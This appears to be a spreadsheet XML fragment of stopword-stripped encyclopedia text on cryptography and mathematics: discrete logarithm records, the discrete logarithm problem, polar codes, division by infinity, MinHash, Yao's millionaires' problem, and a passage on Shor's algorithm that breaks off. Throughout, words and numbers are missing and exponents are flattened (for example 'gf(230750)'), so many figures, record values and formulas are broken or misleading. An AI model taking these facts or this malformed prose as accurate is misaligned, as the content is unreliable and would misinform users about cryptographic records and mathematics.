    <t>discrete logarithm records best results achieved date solving discrete logarithm problem, problem finding solutions equation {\displaystyle g^{x}=h} given elements finite cyclic group difficulty problem basis security several cryptographic systems, including diffie–hellman agreement, elgamal encryption, elgamal signature scheme, digital signature algorithm, elliptic curve cryptography analogs these. common choices used algorithms include multiplicative group integers modulo multiplicative group finite field, group points elliptic curve finite field. current record integers modulo prime numbers, december 2019, discrete logarithm computation modulo prime digits. characteristic current record finite fields, july 2019, discrete logarithm 30750 {\displaystyle gf(2^{30750})} when restricted prime degree, current record, october 2014, 1279 {\displaystyle gf(2^{1279})} characteristic current record, july 2016, {\displaystyle gf(3^{6*509})} fields "moderate" characteristic, current record, january 2013, 33341353 {\displaystyle gf(33341353^{57})} integers modulo 2019, fabrice boudot, pierrick gaudry, aurore guillevic, nadia heninger, emmanuel thomé, paul zimmermann announced computation discrete logarithm modulo 240-digit (795 bit) prime rsa-240 49204 (the first safe prime rsa-240). this computation performed simultaneously factorization rsa-240, using number field sieve algorithm open-source cado-nfs software. discrete logarithm part computation took approximately 3100 core-years, using intel xeon gold 6130 cpus reference (2.1ghz). researchers estimate improvements algorithms software made computation three times faster would expected previous records accounting improvements hardware.previous records integers modulo include: june 2016, thorsten kleinjung, claus diem, arjen lenstra, christine priplata, colin stahlke announced computation discrete logarithm modulo 232-digit (768-bit) safe prime, using number field sieve. computation started february 2015 took approximately 6600 core years scaled intel xeon e5-2660 ghz.on june 2005, antoine joux reynald lercier announced computation discrete logarithm modulo 130-digit (431-bit) strong prime three weeks, using 1.15 16-processor alphaserver gs1280 computer number field sieve algorithm. february 2007 superseded announcement thorsten kleinjung computation discrete logarithm modulo 160-digit (530-bit) safe prime, using number field sieve. most computation done using idle time various parallel computing cluster. june 2014, cyril bouvier, pierrick gaudry, laurent imbert, hamza jeljeli emmanuel thomé announced computation discrete logarithm modulo digit (596-bit) safe prime using number field sieve algorithm.also note, july 2016, joshua fried, pierrick gaudry, nadia heninger, emmanuel thome published discrete logarithm computation 1024-bit prime. they generated prime susceptible special number field sieve, using specialized algorithm comparatively small subgroup (160-bits). while small subgroup, standardized subgroup size used 1024-bit digital signature algorithm (dsa). finite fields current record july 2019) finite field characteristic announced robert granger, thorsten kleinjung, arjen lenstra, benjamin wesolowski, jens zumbrägel july 2019. this team able compute discrete logarithms gf(230750) using 25,481,219 core hours clusters based intel xeon architecture. this computation first large-scale example using elimination step quasi-polynomial algorithm.previous records finite field characteristic announced robert granger, thorsten kleinjung, jens zumbrägel january 2014. this team able compute discrete logarithms gf(29234) using 400,000 core hours. features computation include modified method obtaining logarithms degree elements systematically optimized descent strategy. antoine joux 2013. team able compute discrete logarithms field 26168 (2257)24 elements using less cpu-hours. this computation performed using index calculus algorithm recent computation field 24080 elements. robert granger, faruk göloğlu, gary mcguire, jens zumbrägel 2013. computation concerned field 26120 elements took 749.5 core-hours. antoine joux 22nd, 2013. this used algorithm small characteristic fields previous computation field 21778 elements. computation concerned field 24080 elements, represented degree extension field elements. computation took less 14100 core hours. robert granger, faruk göloğlu, gary mcguire, jens zumbrägel 2013. they used variant medium-sized base field function field sieve, binary fields, compute discrete logarithm field 21971 elements. order medium-sized base field, represented field degree extension field elements. computation took 3132 core hours altix 8200ex cluster using intel (westmere) xeon e5650 hex-core processors. antoine joux 2013. this used algorithm small characteristic fields. computation concerned field 21778 elements, represented degree extension field elements. computation took less core hours.the current record 2014) finite field characteristic prime degree announced thorsten kleinjung october 2014. calculation done field 21279 elements followed essentially path sketched 1223 {\displaystyle \mathbb _{2^{4\cdot 1223}}} main exceptions linear algebra computation descent phase. total running time less four core years. previous record finite field characteristic prime degree announced caramel group april 2013. they used function field sieve compute discrete logarithm field 2809 elements.the current record july 2016) field characteristic announced gora adj, isaac canales-martinez, nareli cruz-cortés, alfred menezes, thomaz oliveira, francisco rodriguez-henriquez, luis rivera-zamarripa july 2016. calculation done 4841-bit finite field elements performed several computers cinvestav university waterloo. total, core years computing time expended computation.previous records finite field characteristic announced: full version asiacrypt 2014 paper joux pierrot (december 2014). solved field gf(35 479), 3796-bit field. this work exploit "special" aspects field kummer twisted-kummer properties. total computation took less 8600 cpu-hours. gora adj, alfred menezes, thomaz oliveira, francisco rodríguez-henríquez february 2014, updating previous announcement january 2014. computation solve 1551-bit field gf(36 163), taking 1201 hours. 2012 joint fujitsu, nict, kyushu university team, computed discrete logarithm field elements size bits, using variation function field sieve beating previous record field elements size bits wide margin.over fields "moderate"-sized characteristic, notable computations 2005 included field 6553725 elements (401 bits) announced 2005, field 37080130 elements (556 bits) announced 2005. current record 2013) finite field "moderate" characteristic announced january 2013. team used variation function field sieve medium prime case compute discrete logarithm field 3334135357 elements 1425-bit finite field). technique used weeks earlier compute discrete logarithm field 3355377147 elements 1175-bit finite field).on june 2014, razvan barbulescu, pierrick gaudry, aurore guillevic, françois morain announced computation discrete logarithm finite field whose order digits degree extension prime field. algorithm used number field sieve (nfs), various modifications. total computing time equivalent days core (sieving) hours (linear algebra). elliptic curves certicom corp. issued series elliptic curve cryptography challenges. level involves fields 109-bit 131-bit sizes. level includes 163, 191, 239, 359-bit sizes. level challenges currently believed computationally infeasible.the level challenges are: ecc2k-108, involving taking discrete logarithm koblitz curve field 2108 elements. prize awarded april 2000 group 1300 people represented robert harley. they used parallelized pollard method speedup. ecc2-109, involving taking discrete logarithm curve field 2109 elements. prize awarded april 2004 group 2600 people represented chris monico. they also used version parallelized pollard method, taking months calendar time. eccp-109, involving taking discrete logarithm curve modulo 109-bit prime. prize awarded 2002 group 10308 people represented chris monico. once again, used version parallelized pollard method, taking days calendar time.none 131-bit larger) challenges 2019. july 2009, joppe bos, marcelo kaihara, thorsten kleinjung, arjen lenstra peter montgomery announced carried discrete logarithm computation elliptic curve (known secp112r1) modulo 112-bit prime. computation done cluster playstation game consoles months. they used common parallelized version pollard method.in april 2014, erich wenger paul wolfger graz university technology solved discrete logarithm 113-bit koblitz curve extrapolated days using 18-core virtex-6 fpga cluster. january 2015, researchers solved discrete logarithm elliptic curve defined 113-bit binary field. average runtime around days using 10-core kintex-7 fpga cluster.on december 2016, daniel bernstein, susanne engels, tanja lange, ruben niederhagen, christof paar, peter schwabe, ralf zimmermann announced solution generic 117.35-bit elliptic curve discrete logarithm problem binary curve, using optimized fpga implementation parallel version pollard's algorithm. attack months fpgas parallel.on august 2017, takuya kusaka, joichi, ikuta, al-amin khandaker, yasuyuki nogami, satoshi uehara, nariyoshi yamai, sylvain duquesne announced solved discrete logarithm problem 114-bit "pairing-friendly" barreto–naehrig (bn) curve, using special sextic twist property curve efficiently carry random walk pollard’s method. implementation used 2000 cores took months solve problem.on june 2020, aleksander zieniewicz (zielar) jean pons (jeanlucpons) announced solution 114-bit interval elliptic curve discrete logarithm problem secp256k1 curve solving 114-bit private bitcoin puzzle transactions challenge. record, used software based pollard kangaroo 256x nvidia tesla v100 processor took days. weeks earlier they used number graphics cards solve 109-bit interval ecdlp days. notes references external links computations discrete logarithms sorted date</t>
  </si>
  <si>
    <t>Discrete logarithm</t>
  </si>
  <si>
    <t>mathematics, given real numbers logarithm logb number analogously, group powers defined integers discrete logarithm logb integer number theory, commonly used term index: write indr (mod (read "the index base modulo (mod primitive root gcd(a,m) discrete logarithms quickly computable special cases. however, efficient method known computing general. several important algorithms public-key cryptography, elgamal base security assumption discrete logarithm problem carefully chosen groups efficient solution. definition group. denote group operation multiplication identity element element positive integer expression denotes product times: factors {\displaystyle b^{k}=\underbrace {b\cdot b\cdots _{k\;{\text{factors}}}.} similarly, denote product times. power identity: also element integer solves equation termed discrete logarithm simply logarithm, context) base writes logb examples powers powers form infinite subset 0.001, 0.01, 0.1, 100, 1000, rational numbers. this cyclic group multiplication, generator. element group, compute log10 example, log10 10000 log10 0.001 these instances discrete logarithm problem. other base-10 logarithms real numbers instances discrete logarithm problem, involve non-integer exponents. example, equation log10 1.724276… means 101.724276… while integer exponents defined group using products inverses, arbitrary exponents real numbers require concepts exponential function. powers fixed real number similar example holds non-zero real number powers form multiplicative subgroup b−3, b−2, b−1, non-zero real numbers. element compute logb modular arithmetic simplest settings discrete logarithms group (zp)×. this group multiplication modulo prime elements congruence classes modulo group product elements obtained ordinary integer multiplication elements followed reduction modulo power numbers group computed finding power integer finding remainder division when numbers involved large, efficient reduce modulo multiple times computation. regardless specific algorithm used, operation called modular exponentiation. example, consider (z17)×. compute group, compute divide obtaining remainder thus group (z17)×. discrete logarithm inverse operation. example, consider equation (mod from example above, solution solution. since (mod 17)—as follows fermat's little theorem—it also follows integer 34+16n (316)n (mod 17). hence equation infinitely many solutions form 16n. moreover, smallest positive integer satisfying (mod 17), solutions. equivalently, possible solutions expressed constraint (mod 16). powers identity special case identity element group discrete logarithm logb undefined every integer discrete logarithm properties powers obey usual algebraic identity words, function {\displaystyle f\colon \mathbf defined f(k) group homomorphism integers addition onto subgroup generated logb exists. conversely, logb exist infinite, logb also unique, discrete logarithm amounts group isomorphism {\displaystyle \log _{b}\colon h\to \mathbf hand, finite order logb unique congruence modulo discrete logarithm amounts group isomorphism {\displaystyle \log _{b}\colon h\to \mathbf _{n},} denotes additive group integers modulo familiar base change formula ordinary logarithms remains valid: another generator {\displaystyle \log _{c}a=\log _{c}b\cdot \log _{b}a.} algorithms discrete logarithm problem considered computationally intractable. that efficient classical algorithm known computing discrete logarithms general. general algorithm computing logb finite groups raise larger larger powers desired found. this algorithm sometimes called trial multiplication. requires running time linear size group thus exponential number digits size group. therefore, exponential-time algorithm, practical small groups more sophisticated algorithms exist, usually inspired similar algorithms integer factorization. these algorithms faster naïve algorithm, proportional square root size group, thus exponential half number digits size group. however none runs polynomial time number digits size group). baby-step giant-step function field sieve index calculus algorithm number field sieve pohlig–hellman algorithm pollard's algorithm logarithms pollard's kangaroo algorithm (aka pollard's lambda algorithm)there efficient quantum algorithm peter shor.efficient classical algorithms also exist certain special cases. example, group integers modulo addition, power becomes product equality means congruence modulo integers. extended euclidean algorithm finds quickly. with diffie–hellman cyclic group modulus prime used, allowing efficient computation discrete logarithm pohlig–hellman order group (being p−1) sufficiently smooth, i.e. large prime factors. comparison integer factorization while computing discrete logarithms factoring integers distinct problems, share properties: special cases hidden subgroup problem finite abelian groups, problems seem difficult efficient algorithms known non-quantum computers), problems efficient algorithms quantum computers known, algorithms problem often adapted other, difficulty problems used construct various cryptographic systems. cryptography there exist groups computing discrete logarithms apparently difficult. cases (e.g. large prime order subgroups groups (zp)×) efficient algorithm known worst case, average-case complexity shown hard worst case using random self-reducibility. time, inverse problem discrete exponentiation difficult computed efficiently using exponentiation squaring, example). this asymmetry analogous integer factorization integer multiplication. both asymmetries (and possibly one-way functions) exploited construction cryptographic systems. popular choices group discrete logarithm cryptography (dlc) cyclic groups (zp)× (e.g. elgamal encryption, diffie–hellman exchange, digital signature algorithm) cyclic subgroups elliptic curves finite fields (see elliptic curve cryptography). while publicly known algorithm solving discrete logarithm problem general, first three steps number field sieve algorithm depend group specific elements whose finite desired. precomputing three steps specific group, need carry last step, much less computationally expensive first three, obtain specific logarithm group.it turns much internet traffic uses handful groups order 1024 bits less, e.g. cyclic groups order oakley primes specified 2409. logjam attack used vulnerability compromise variety internet services allowed groups whose order 512-bit prime number, called export grade.the authors logjam attack estimate much difficult precomputation needed solve discrete problem 1024-bit prime would within budget large national intelligence agency u.s. national security agency (nsa). logjam authors speculate precomputation widely reused 1024 primes behind claims leaked documents able break much current cryptography. references further reading richard crandall; carl pomerance. chapter prime numbers: computational perspective, ed., springer. stinson, douglas robert (2006), cryptography: theory practice (3rd ed.), london: press, isbn 978-1-58488-508-5 also faber model percy ludgate irish logarithm</t>
  </si>
  <si>
    <t>Polar code (coding theory)</t>
  </si>
  <si>
    <t>information theory, polar code linear block error-correcting code. code construction based multiple recursive concatenation short kernel code transforms physical channel virtual outer channels. when number recursions becomes large, virtual channels tend either high reliability reliability words, polarize become sparse), data bits allocated reliable channels. first code explicit construction provably achieve channel capacity symmetric binary-input, discrete, memoryless channels (b-dmc) polynomial dependence capacity. notably, polar codes modest encoding decoding complexity renders attractive many applications. moreover, encoding decoding energy complexity generalized polar codes reach fundamental lower bounds energy consumption dimensional circuitry within o(nε polylog factor industrial applications polar codes limitations used industrial applications. primarily, original design polar codes achieves capacity block sizes asymptotically large successive cancellation decoder. however, block sizes used industry, performance successive cancellation poor compared well-defined implemented coding schemes low-density parity-check code (ldpc) turbo code. polar performance improved successive cancellation list decoding, usability real applications still questionable poor implementation efficiencies caused iterative approach.in october 2016, huawei announced achieved gbit/s field trial tests using polar codes channel coding. improvements introduced channel performance almost closed shannon limit, sets maximum rate given bandwidth given noise level.in november 2016, 3gpp agreed adopt polar codes embb (enhanced mobile broadband) control channels (new radio) interface. meeting, 3gpp agreed ldpc corresponding data channel. code arıkan recently introduced novel polar coding method dubbed polarization-adjusted convolutional (pac) codes. short blocklengths, codes outperform convolutional codes crc-aided list decoding conventional polar codes. references external links aff3ct home page: fast forward error correction toolbox high speed polar code simulations software</t>
  </si>
  <si>
    <t>Division by infinity</t>
  </si>
  <si>
    <t>mathematics, division infinity division divisor (denominator) infinity. ordinary arithmetic, well-defined meaning, since infinity mathematical concept correspond specific number, moreover, nonzero real number that, added infinite number times, gives finite number. however, "dividing infinity" given meaning informal expressing limit dividing number larger larger divisors.: 201–204 using mathematical structures beyond real numbers, possible define numbers infinite magnitude still manipulated ways much like ordinary arithmetic. example, extended real number line, dividing real number infinity yields zero, surreal number system, dividing infinite number {\displaystyle \omega yields infinitesimal number {\displaystyle \epsilon floating-point arithmetic, finite number divided {\displaystyle \infty equal positive negative zero numerator finite. otherwise, result nan. challenges providing rigorous meaning "division infinity" analogous defining division zero. technology infinity difficult deal calculators computers many formal computing division infinity. calculators ti-84 household calculators infinity button impossible type calculator divided infinity' instead users type large number "1e99" {\displaystyle 1\times 10^{99}} "-1e99". typing number divided sufficiently large number output cases fails either overflow error numerator also sufficiently large number output real number. wolfram language, dividing integer infinity result result also, calculators ti-nspire, divided infinity evaluated calculus integration calculus, taking integral function defined finding area curve. this done simply breaking area rectangular sections taking sections. these called riemann sums. sections narrower, riemann becomes increasingly accurate approximation true area. taking limit riemann sums, sections heuristically regarded "infinitely thin", gives definite integral function prescribed interval. conceptually results dividing interval infinity result infinitely small pieces.: 255–259 different note taking integral boundaries infinity defined improper integral. determine would take limit variable approaches infinity substituting infinity sign. this would allow integral evaluated limit would taken. many cases evaluating would result term divided infinity. case order evaluate integral would assume zero. this allows integral assumed converge meaning finite answer determined integral using assumption. l'hôpital's rule when given ratio functions, limit ratio evaluated computing limit function separately. where limit function denominator infinity, numerator allow ratio well determined, limit ratio said indeterminate form. example {\displaystyle {\frac {\infty }{\infty using l'hôpital's rule evaluate limits fractions denominator tends towards infinity produce results {\displaystyle \lim _{x\to c}{\frac {f'(x)}{g'(x)}}} {\displaystyle \lim _{x\to c}{\frac {f(x)}{g(x)}}=\lim _{x\to c}{\frac {f'(x)}{g'(x)}}} {\displaystyle \lim _{x\to c}|f(x)|=\lim _{x\to c}|g(x)|=\infty {\displaystyle \lim _{x\to c}{\frac {f(x)}{g(x)}}=l} this means that, using limits give meaning division infinity, result "dividing infinity" always equal references external links divide zero bill shillito</t>
  </si>
  <si>
    <t>MinHash</t>
  </si>
  <si>
    <t>computer science data mining, minhash min-wise independent permutations locality sensitive hashing scheme) technique quickly estimating similar sets are. scheme invented andrei broder (1997), initially used altavista search engine detect duplicate pages eliminate search results. also applied large-scale clustering problems, clustering documents similarity sets words. jaccard similarity minimum hash values jaccard similarity coefficient commonly used indicator similarity sets. subsets jaccard index defined ratio number elements intersection number elements union: {\displaystyle j(a,b)={{|a\cap \over {|a\cup b|}}.} this value sets disjoint, equal, strictly otherwise. sets similar (i.e. relatively members common) jaccard index closer goal minhash estimate j(a,b) quickly, without explicitly computing intersection union. hash function maps members distinct integers, perm random permutation elements subset define hmin(s) minimal member respect perm—that member minimum value h(perm(x)). cases hash function used assumed pseudo-random properties, random permutation would used.) now, applying hmin assuming hash collisions, values equal (hmin(a) hmin(b)) among elements {\displaystyle a\cup element minimum hash value lies intersection {\displaystyle a\cap probability true exactly jaccard index, therefore: hmin(a) hmin(b) j(a,b),that probability hmin(a) hmin(b) true equal similarity j(a,b), assuming drawing perm uniform distribution. words, random variable hmin(a) hmin(b) zero otherwise, unbiased estimator j(a,b). high variance useful estimator jaccard similarity own, {\displaystyle always zero one. idea minhash scheme reduce variance averaging together several variables constructed way. algorithm variant many hash functions simplest version minhash scheme uses different hash functions, fixed integer parameter, represents values hmin(s) functions. estimate j(a,b) using version scheme, number hash functions hmin(a) hmin(b), estimate. this estimate average different random variables, hmin(a) hmin(b) zero otherwise, unbiased estimator j(a,b). therefore, average also unbiased estimator, standard deviation sums random variables, expected error o(1/√k).therefore, constant constant o(1/ε2) expected error estimate example, hashes would required estimate j(a,b) expected error less equal .05. variant single hash function computationally expensive compute multiple hash functions, related version minhash scheme avoids penalty using single hash function uses select multiple values rather selecting single minimum value hash function. hash function, fixed integer. values domain define h(k)(s) subset members smallest values this subset h(k)(s) used signature similarity sets estimated comparing signatures. specifically, sets. then h(k)(h(k)(a) h(k)(b)) h(k)(a elements random function subset elements equally likely chosen; simple random sample subset h(k)(a) h(k)(b) members belong intersection therefore, |y|/k unbiased estimator j(a,b). difference estimator estimator produced multiple hash functions always exactly members, whereas multiple hash functions lead smaller number sampled elements possibility different hash functions minima. however, small relative sizes sets, difference negligible. standard chernoff bounds sampling without replacement, estimator expected error o(1/√k), matching performance multiple-hash-function scheme. time analysis estimator |y|/k computed time o(k) signatures given sets, either variant scheme. therefore, constants, time compute estimated similarity signatures also constant. signature computed linear time size set, many pairwise similarities need estimated method lead substantial savings running time compared full comparison members set. specifically, size many hash variant takes time. single hash variant generally faster, requiring o(n) time maintain queue minimum hash values assuming incorporating weights variety techniques introduce weights computation minhashes developed. simplest extends integer weights. extend hash function accept member integer, generate multiple hashes item, according weight. item occurs times, generate hashes {\displaystyle h(i,1),h(i,2),\ldots ,h(i,n)} original algorithm expanded hashes. doing yields weighted jaccard index collision probability. {\displaystyle j_{\mathcal {w}}(x,y)={\frac {\sum _{i}\min(x_{i},y_{i})}{\sum _{i}\max(x_{i},y_{i})}}} further extensions achieve collision probability real weights better runtime developed, dense data, another sparse data.another family extensions exponentially distributed hashes. uniformly random hash converted follow exponential distribution inversion. this method exploits many beautiful properties minimum exponential variables. {\displaystyle h(x)={\underset {i}{\operatorname {arg\,min} }}{\frac {-\log(h(i))}{x_{i}}}} this yields collision probability probability jaccard index {\displaystyle j_{\mathcal {p}}(x,y)=\sum _{x_{i}\neq \atop y_{i}\neq 0}{\frac {1}{\sum _{j}\max \left({\frac {x_{j}}{x_{i}}},{\frac {y_{j}}{y_{i}}}\right)}}} min-wise independent permutations order implement minhash scheme described above, needs hash function define random permutation elements, total number distinct elements union sets compared. different permutations, would require bits specify truly random permutation, infeasibly large number even moderate values because fact, analogy theory universal hashing, significant work finding family permutations "min-wise independent", meaning subset domain, element equally likely minimum. established min-wise independent family permutations must include least {\displaystyle \operatorname {lcm} (1,2,\cdots ,n)\geq e^{n-o(n)}} different permutations, therefore needs ω(n) bits specify single permutation, still infeasibly large. practical min-wise independent hash functions because impracticality, variant notions min-wise independence introduced: restricted min-wise independent permutations families, approximate min-wise independent families. restricted min-wise independence min-wise independence property restricted certain sets cardinality approximate min-wise independence fixed probability varying full independence.in 1999 piotr indyk proved k-wise independent family hash functions also approximately min-wise independent {\displaystyle large enough. particular, constants {\displaystyle c,c'&gt;0} {\displaystyle k\geq c\log {\tfrac {1}{\epsilon {\displaystyle _{h\in {\mathcal {h}}}[h(x)&lt;\min h(x)]={\frac {1}{|x|+1}}(1\pm \epsilon sets {\displaystyle |x|\leq \epsilon nc'} {\displaystyle x\in (note, {\displaystyle (1\pm \epsilon means probability factor {\displaystyle 1+\epsilon big, {\displaystyle 1-\epsilon small.) this guarantee among things, sufficient give jaccard bound required minhash algorithm. that {\displaystyle {\displaystyle sets, {\displaystyle _{h\in {\mathcal {h}}}[\min h(a)=\min h(b)]={\frac {|a\cap b|}{|a\cup b|}}\pm \epsilon since k-wise independent hash functions specified using {\displaystyle k\log bits, approach much practical using completely min-wise independent permutations. another practical family hash functions give approximate min-wise independence tabulation hashing. applications original applications minhash involved clustering eliminating near-duplicates among documents, represented sets words occurring documents. similar techniques also used clustering near-duplicate elimination types data, images: case image data, image represented smaller subimages cropped sets complex image feature descriptions.in data mining, cohen (2001) minhash tool association rule learning. given database entry multiple attributes (viewed matrix database entry column attribute) minhash-based approximations jaccard index identify candidate pairs attributes frequently co-occur, compute exact value index pairs determine ones whose frequencies co-occurrence given strict threshold.the minhash algorithm adapted bioinformatics, problem comparing genome sequences similar theoretical underpinning comparing documents web. minhash-based tools allow rapid comparison whole genome sequencing data reference genomes (around minutes compare genome 90000 reference genomes refseq), suitable speciation maybe limited degree microbial sub-typing. there also applications metagenomics minhash derived algorithms genome alignment genome assembly. accurate average nucleotide identity (ani) values generated efficiently minhash-based algorithms. other uses minhash scheme seen instance locality sensitive hashing, collection techniques using hash functions large sets objects smaller hash values that, objects small distance other, hash values likely same. instance, signature seen hash value. other locality sensitive hashing techniques exist hamming distance sets cosine distance vectors; locality sensitive hashing important applications nearest neighbor search algorithms. large distributed systems, particular mapreduce, exist modified versions minhash help compute similarities dependence point dimension. evaluation benchmarks large scale evaluation conducted google 2006 compare performance minhash simhash algorithms. 2007 google reported using simhash duplicate detection crawling using minhash google news personalization. also bloom filter simhash w-shingling count–min sketch references</t>
  </si>
  <si>
    <t>Yao's Millionaires' problem</t>
  </si>
  <si>
    <t>yao's millionaires' problem secure multi-party computation problem introduced 1982 computer scientist computational theorist andrew yao. problem discusses millionaires, alice bob, interested knowing richer without revealing actual wealth. this problem analogous general problem numbers {\displaystyle {\displaystyle goal determine whether inequality {\displaystyle a\geq true false without revealing actual values {\displaystyle {\displaystyle millionaires' problem important problem cryptography, solution used e-commerce data mining. commercial applications sometimes compare numbers confidential whose security important. many solutions introduced problem. first solution, presented yao, exponential time space. protocols proof protocol hsiao-ying wen-guey tzeng {\displaystyle s=s_{n}s_{n-1}\ldots s_{1}\in \{0,1\}^{n}} binary string length denote 0-encoding {\displaystyle s_{s}^{0}=\{s_{n}s_{n-1}\ldots s_{i+1}1\mid s_{i}=0;1\leq i\leq n\}} 1-encoding {\displaystyle s_{s}^{1}=\{s_{n}s_{n-1}\ldots s_{i}\mid s_{i}=1;1\leq i\leq n\}.} then, protocol based following claim: assume binary strings length bits. then {\displaystyle a&gt;b} sets {\displaystyle s_{a}^{1}} {\displaystyle s_{b}^{0}} common element (where binary encodings corresponding integers).the protocol leverages idea practical solution yao's millionaires' problem performing private intersection {\displaystyle s_{a}^{1}} {\displaystyle s_{b}^{0}} protocol ioannidis ananth protocol uses variant oblivious transfer, called oblivious transfer. transfer transferred following way: sender bits {\displaystyle s_{0}} {\displaystyle s_{1}} receiver chooses {\displaystyle i\in \{0,1\}} sender sends {\displaystyle s_{i}} oblivious transfer protocol receiver information {\displaystyle s_{(1-i)}} value {\displaystyle exposed sender.to describe protocol, alice's number indicated {\displaystyle bob's number {\displaystyle assumed length binary representation less {\displaystyle {\displaystyle d\in \mathbb protocol takes following steps. alice creates matrix {\displaystyle size {\displaystyle d\times {\displaystyle -bit numbers, {\displaystyle length oblivious transfer protocol. addition, chooses random numbers {\displaystyle {\displaystyle {\displaystyle 0\leq u&lt;2k} {\displaystyle v\leq {\displaystyle k_{ijl}} {\displaystyle number appears cell {\displaystyle k_{ij}} (where {\displaystyle l=0} indicates least significant bit). addition, {\displaystyle a_{i}} denoted {\displaystyle alice's number {\displaystyle every {\displaystyle {\displaystyle 1\leq i\leq alice following actions. every {\displaystyle j\geq sets {\displaystyle k_{i1j}} {\displaystyle k_{i2j}} random bits. {\displaystyle a_{i}=1} {\displaystyle l=1} otherwise {\displaystyle l=2} every {\displaystyle 0\leq j\leq 2\cdot i-1} {\displaystyle k_{ilj}} random bit. {\displaystyle m=2\cdot {\displaystyle k_{il(m+1)}=1} {\displaystyle k_{ilm}} {\displaystyle a_{i}} every {\displaystyle i,1\leq i&lt;d} {\displaystyle s_{i}} random {\displaystyle -bit number, {\displaystyle s_{d}} another number {\displaystyle bits bits except last random, last calculated {\displaystyle s_{d(k-1)}=1\oplus \bigoplus _{j=1}^{d-1}s_{j(k-1)}\oplus \bigoplus _{j=1}^{d}k_{j1(k-1)}} {\displaystyle s_{d(k-2)}=1\oplus \bigoplus _{j=1}^{d-1}s_{j(k-2)}\oplus \bigoplus _{j=1}^{d}k_{j1(k-2)}} {\displaystyle \bigoplus bitwise operation. {\displaystyle l=1,2} {\displaystyle k'_{ij}=\operatorname {rot} (k_{il}\oplus s_{i},u)} where {\displaystyle \operatorname {rot} (x,t)} indicates bitwise rotation {\displaystyle left {\displaystyle bits. every {\displaystyle {\displaystyle 0\leq i\leq transfers {\displaystyle k'_{il}} oblivious transfer protocol, {\displaystyle l=b_{i}+1} {\displaystyle b_{i}} {\displaystyle {\displaystyle alice sends {\displaystyle n=\operatorname {rot} \left(\bigoplus _{j=1}^{d}s_{j},u\right)} calculates bitwise numbers step {\displaystyle step scans result left right finds large sequence zero bits. {\displaystyle right sequence {\displaystyle zero). right {\displaystyle equals {\displaystyle a\geq otherwise {\displaystyle a&lt;b} proof correctness calculates final result {\displaystyle n\oplus \bigoplus _{i=1}^{d}k'_{i(b_{i}+1)}=\operatorname {rot} \left(\bigoplus _{i=1}^{d}k_{i(b_{i}+1)},u\right)} result depends {\displaystyle c=\bigoplus _{i=1}^{d}k_{i(b_{i}+1)}} therefore well, split parts. left part affect result. right part important information, middle sequence zeros separates parts. length partition linked security scheme. every {\displaystyle k_{i1},k_{i2}} non-zero right part, {\displaystyle k_{i1}} {\displaystyle a_{i}=1} {\displaystyle k_{i2}} otherwise. addition, {\displaystyle i&gt;j} {\displaystyle k_{il}} non-zero right part, {\displaystyle k_{il}\oplus k_{jl}} also non-zero right part, leftmost bits right part {\displaystyle a_{il}} result, right part function entries transferred correspond unique bits bits right part random leftmost, exactly bits determines result {\displaystyle a_{i}&gt;b_{i}} highest-order differ. end, {\displaystyle a_{i}&gt;b_{i}} leftmost bits answer {\displaystyle a\geq bits {\displaystyle a_{i}&lt;b_{i}} answer {\displaystyle a&lt;b} {\displaystyle a=b} right part case leftmost bits indicate result. security information sends alice secure sent oblivious transfer, secure. gets numbers alice: {\displaystyle \operatorname {rol} (k_{i(1+b_{i})}\oplus s_{i},u)} every {\displaystyle receives number, {\displaystyle s_{i}} random, secure information transformed. this random numbers, therefore reveals information. relevant information revealed calculating goes left part random, right part random well, except leftmost bits. deducing information bits requires guessing values, chance guessing correct low. complexity complexity protocol {\displaystyle o(d^{2})} alice constructs d-length number calculates times d-length numbers. complexity operations {\displaystyle o(d^{2})} communication part takes also {\displaystyle o(d^{2})} therefore, complexity protocol {\displaystyle o(d^{2}).} also cryptography secure multi-party computation socialist millionaire problem, variant millionaires wish determine whether fortunes equal. references</t>
  </si>
  <si>
    <t>Shor's algorithm</t>
  </si>
  <si>
    <t>shor's algorithm quantum computer algorithm finding prime factors integer. developed 1994 american mathematician peter shor.on quantum computer, factor integer {\displaystyle shor's algorithm runs polynomial time, meaning time taken polynomial {\displaystyle \log size integer given input. specifically, takes quantum gates order {\displaystyle o\!\left((\log n)^{2}(\log \log n)(\log \log \log n)\right)} using fast multiplication, thus demonstrating integer factorization problem efficiently solved quantum computer consequently complexity class bqp. this almost exponentially faster efficient known classical factoring algorithm, general number field sieve, works sub-exponential time: {\displaystyle o\!\left(e^{1.9(\log n)^{1/3}(\log \log n)^{2/3}}\right)} efficiency shor's algorithm efficiency quantum fourier transform, modular exponentiation repeated squarings.if quantum computer sufficient number qubits could operate without succumbing quantum noise quantum-decoherence phenomena, shor's algorithm could used break public-key cryptography schemes, scheme finite field diffie-hellman exchange elliptic curve diffie-hellman exchangersa based assumption factoring large integers computationally intractable. known, assumption valid classical (non-quantum) computers; classical algorithm known factor integers polynomial time. however, shor's algorithm shows factoring integers efficient ideal quantum computer, feasible defeat constructing large quantum computer. also powerful motivator design construction quantum computers, study quantum-computer algorithms. also facilitated research cryptosystems secure quantum computers, collectively called post-quantum cryptography. 2001, shor's algorithm demonstrated group ibm, factored {\displaystyle {\displaystyle 3\times using implementation quantum computer {\displaystyle qubits. after ibm's implementation, independent groups implemented shor's algorithm using photonic qubits, emphasizing multi-qubit entanglement observed running shor's algorithm circuits. 2012, factorization {\displaystyle performed solid-state qubits. also, 2012, factorization {\displaystyle achieved, setting record largest integer factored shor's algorithm. 2019 attempt made factor number {\displaystyle using shor's algorithm system one, algorithm failed accumulating errors. though larger numbers factored quantum computers using algorithms, algorithms similar classical brute-force checking factors, unlike shor's algorithm, expected ever perform better classical factoring algorithms. procedure problem trying solve given composite number {\displaystyle find non-trivial divisor {\displaystyle divisor strictly {\displaystyle {\displaystyle before attempting find divisor, there's doubt whether {\displaystyle composite prime, relatively quick primality-testing algorithms verify {\displaystyle indeed composite, although part shor's algorithm. shor's algorithm consists parts: reduction, done classical computer, factoring problem problem order-finding. quantum algorithm solve order-finding problem.the algorithm find non-trivial square root {\displaystyle {\displaystyle modulo {\displaystyle different {\displaystyle {\displaystyle {\displaystyle b^{2}-1=(b+1)(b-1)=mn} non-zero integer {\displaystyle gives distinct non-trivial divisors {\displaystyle \gcd(n,b+1)} {\displaystyle \gcd(n,b-1)} {\displaystyle this idea similar factoring algorithms, quadratic sieve, detailed explanation found explanation section below. before starting algorithm, imperative check {\displaystyle (otherwise {\displaystyle divisor) power integer (otherwise integer divisor), guarantee existence non-trivial square root {\displaystyle {\displaystyle modulo {\displaystyle turn, finding {\displaystyle reduced finding element {\displaystyle parameter integer 